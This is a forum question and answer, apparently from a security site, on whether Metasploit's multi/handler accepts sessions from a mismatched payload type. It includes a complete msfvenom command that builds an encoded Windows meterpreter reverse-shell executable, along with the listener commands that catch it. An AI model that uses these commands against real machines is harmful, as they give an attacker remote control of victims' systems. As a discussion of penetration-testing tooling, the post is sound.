# specific metasploit question about handler

Tags: metasploit

Can the handler exploit/multi/handler handle a connection from another type of payload ?

payload generation:

```
msfvenom LHOST=IP LPORT=PORT -f exe -e x86/shikata_ga_nai -p windows/meterpreter_reverse_https -o payload.exe
```

Listener:

```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST "IP"
set LPORT "PORT"
exploit
```

when the target launch the "payload.exe", a session will open in the attacker console ?

Comment: Do you mean concurrently on the same multi/handler module? If so, the answer is no. It can, however, handle more than one connection of the same payload type and the same settings from various victims. This would open multiple sessions on your handler allowing you to switch accordingly.

Comment: it MUST be exactly the same payload, ok.thanks

Answer (score 1):

Your handler has been set with a specific payload (since it requires knowledge of a few details before it can correctly run the payload), so connections from different payloads will eventually be dropped.

It will however accept multiple connections with the same payload (as mentioned in the comments).